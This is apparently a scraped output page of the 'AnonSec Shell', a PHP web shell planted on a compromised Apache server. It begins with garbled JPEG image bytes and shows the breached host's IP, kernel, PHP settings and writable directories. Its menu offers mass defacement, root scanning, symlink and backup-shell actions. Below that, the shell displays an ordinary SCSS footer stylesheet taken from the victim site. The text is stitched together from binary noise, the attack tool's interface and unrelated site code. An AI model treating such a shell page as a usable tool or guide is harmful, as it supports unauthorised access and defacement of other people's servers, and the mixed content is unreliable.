JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/www/assets/sass/front/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/www/assets/sass/front/partials/_footer.scss
/* --------------------------------------------------------------
-- Footer
-------------------------------------------------------------- */

.footer {
    padding: rem($gap * 2) 0 0 0;
    background-color: $white;

    @include mobile {
        padding: rem($gap) 0 0 0;
    }
}

.footer__topline {
    display: flex;
    background-color: $gray2;
    text-align: center;
    padding-top: rem(40);
    padding-bottom: rem(40);
    justify-content: center;

    @include until-widescreen {
        padding-top: rem(25);
        padding-bottom: rem(25);
    }

    @include mobile {
        padding-top: rem(17);
        padding-bottom: rem(17);
    }
}

.footer__icon {
    display: flex;
    margin-left: rem(19);
    margin-right: rem(19);

    &:hover,
    &:focus {
        opacity: 0.7;
    }

    @include mobile {
        margin-left: rem(11);
        margin-right: rem(11);

        img {
            max-width: rem(27);
        }
    }
}

.footer__content {
    padding-top: rem(50);
    padding-bottom: rem(33);

    @include mobile {
        padding-top: rem(27);
        padding-bottom: rem(21);
    }
}

.footer__title.title {
    font-size: 25px;
    color: $primary;
    margin-bottom: rem(14);
    text-align: left;

    @include mobile {
        font-size: 20px;
        margin-bottom: rem(7);
    }
}

.footer__list {
    margin-bottom: rem(22);

    li {
        padding-top: rem(3);
        padding-bottom: rem(3);
    }

    a {
        color: $black;

        &:hover,
        &:focus {
            text-decoration: underline;
        }

        @include mobile {
            font-size: 12px;
            padding-top: rem(9);
            padding-bottom: rem(9);
        }
    }

    @include mobile {
        margin-bottom: rem(4);
    }
}

.footer__mid-title.title {
    font-size: 25px;
    color: $primary;
    margin-bottom: rem(50);
    padding-left: rem(72);
    text-align: left;

    @include until-widescreen {
        padding-left: rem(24);
        margin-bottom: rem(25);
    }

    @include mobile {
        font-size: 20px;
        margin-bottom: rem(28);
        padding-left: 0;
    }
}

.footer__psi-logo {

    @include until-widescreen {
        display: none;
    }
}

.footer__advantage-list {
    display: flex;
    border-top: rem(1) solid $primary-light;
    border-bottom: rem(1) solid $primary-light;
    padding-top: rem(39);
    padding-bottom: rem(35);

    @include until-widescreen {
        padding-left: rem(15);
        padding-right: rem(15);
        flex-wrap: wrap;
        padding-top: rem(25);
        padding-bottom: rem(3);
    }

    @include mobile {
        padding-top: rem(25);
        padding-bottom: rem(10);
    }
}

.footer__advantage {
    width: 20%;
    text-align: center;
    font-size: 15px;

    strong {
        font-size: 25px;
        color: $primary;
        margin-bottom: rem(6);
        font-weight: 700;

        @include mobile {
            font-size: rem(20);
            margin-bottom: rem(10);
        }
    }

    @include until-widescreen {
        width: 33.333%;
        margin-bottom: rem(15);
    }

    @include mobile {
        font-size: rem(12);
        margin-bottom: rem(20);
        padding: 0 rem(5);

        &:nth-child(1) {
            width: 50%;
            order: 1;
        }

        &:nth-child(2) {
            order: 3;
        }

        &:nth-child(3) {
            width: 50%;
            order: 2;
        }

        &:nth-child(4) {
            order: 4;
        }

        &:nth-child(5) {
            order: 5;
        }
    }
}

.footer__contact-line {
    background-color: $primary-lighter;
    padding-top: rem(37);
    padding-bottom: rem(31);

    .container {
        display: flex;

        @include mobile {
            flex-wrap: wrap;
            justify-content: space-between;
        }
    }

    @include until-widescreen {
        padding-top: rem(47);
        padding-bottom: rem(51);
    }

    @include mobile {
        padding-top: rem(26);
        padding-bottom: rem(32);
    }
}

.footer__contact-text {
    font-weight: 600;
    min-width: rem(190);

    @include until-widescreen {
        margin-bottom: rem(22);
    }

    @include mobile {
        font-size: rem(12);
        min-width: 0;
    }
}

.footer__contact-link {
    min-width: rem(225);
    color: $primary;

    @include mobile {
        font-size: rem(12);
        min-width: 0;
    }
}

.footer__contact-link-item {
    display: block;

    &:nth-child(1) {

        @include until-widescreen {
            display: none;
        }

        @include mobile {
            display: block;
        }
    }

    &:nth-child(2) {
        font-size: rem(22);

        @include mobile {
            font-size: rem(17);
        }
    }
}

.footer__contact-button {

    @include until-widescreen {
        padding-top: rem(60);
    }

    @include mobile {
        padding-top: rem(3);
    }
}

.footer__contact-content {
    display: flex;

    @include until-widescreen {
        flex-direction: column;
        width: 27%;
    }

    @include mobile {
        width: auto;
    }
}

.footer__contact-map {
    display: flex;
    flex-grow: 1;
    align-items: center;
    margin-left: rem(88);
    font-size: rem(16);
    font-weight: 700;
    color: $primary;
    position: relative;

    &::after {
        content: '';
        position: absolute;
        right: 0;
        top: rem(-65);
        width: rem(353);
        height: rem(191);
        background-repeat: no-repeat;
        background-position: center;
        background-image: url('/images/front/system/static/footer-map2.svg');

        @include until-widescreen {
            top: rem(51);
            left: 0;
            right: auto;
        }

        @include mobile {
            top: rem(10);
            width: rem(212);
            height: rem(118);
            background-size: 100%;
            left: auto;
            right: 0;
        }

        @media only screen and (max-width: 400px) {
            width: rem(164);
            height: rem(90);
            top: rem(15);
        }
    }

    @include until-widescreen {
        align-items: flex-start;
        margin-top: rem(-28);
        width: calc(70% - #{rem(173)});
        margin-left: 3%;
    }

    @include mobile {
        font-size: rem(12);
        width: 100%;
        margin-left: 0;
        margin-top: 0;
        padding-top: rem(45);
    }
}

.footer__bottom {
    padding-top: rem(20);
    padding-bottom: rem(22);
    font-weight: 700;

    @include until-widescreen {
        padding-bottom: rem(50);
    }

    @include mobile {
        font-size: rem(12);
        padding-top: rem(8);
        padding-bottom: rem(25);
    }
}

Anon7 - 2022
AnonSec Team